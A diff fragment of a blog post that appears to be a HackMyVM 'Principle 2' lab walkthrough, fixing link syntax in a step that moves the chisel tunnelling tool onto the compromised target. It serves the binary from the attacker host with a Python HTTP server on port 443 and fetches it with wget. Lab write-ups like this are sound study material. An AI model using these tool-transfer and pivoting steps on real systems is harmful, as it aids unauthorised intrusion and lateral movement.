rubenhortas/rubenhortas.github.io/_posts/2023-12-18-hmv-principle2-walkthrough.md

 Linux principle2 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
 ```

-We need the amd64 version of chisel, and copy the binary from our host to [2][Principle 2].
+We need the amd64 version of chisel, and copy the binary from our host to [Principle 2][2].
 To do this, we will mount an http server in our host, in the directory where we have the chisel binaries, with python:

 ```
 $ python -m http.server 443
 ```

-And, in [2][Principle 2], we download the chisel bynary from our host:
+And, in [Principle 2][2], we download the chisel bynary from our host:

 ```
 $ wget http://192.168.1.21:443/chisel_1.9.1_linux_amd64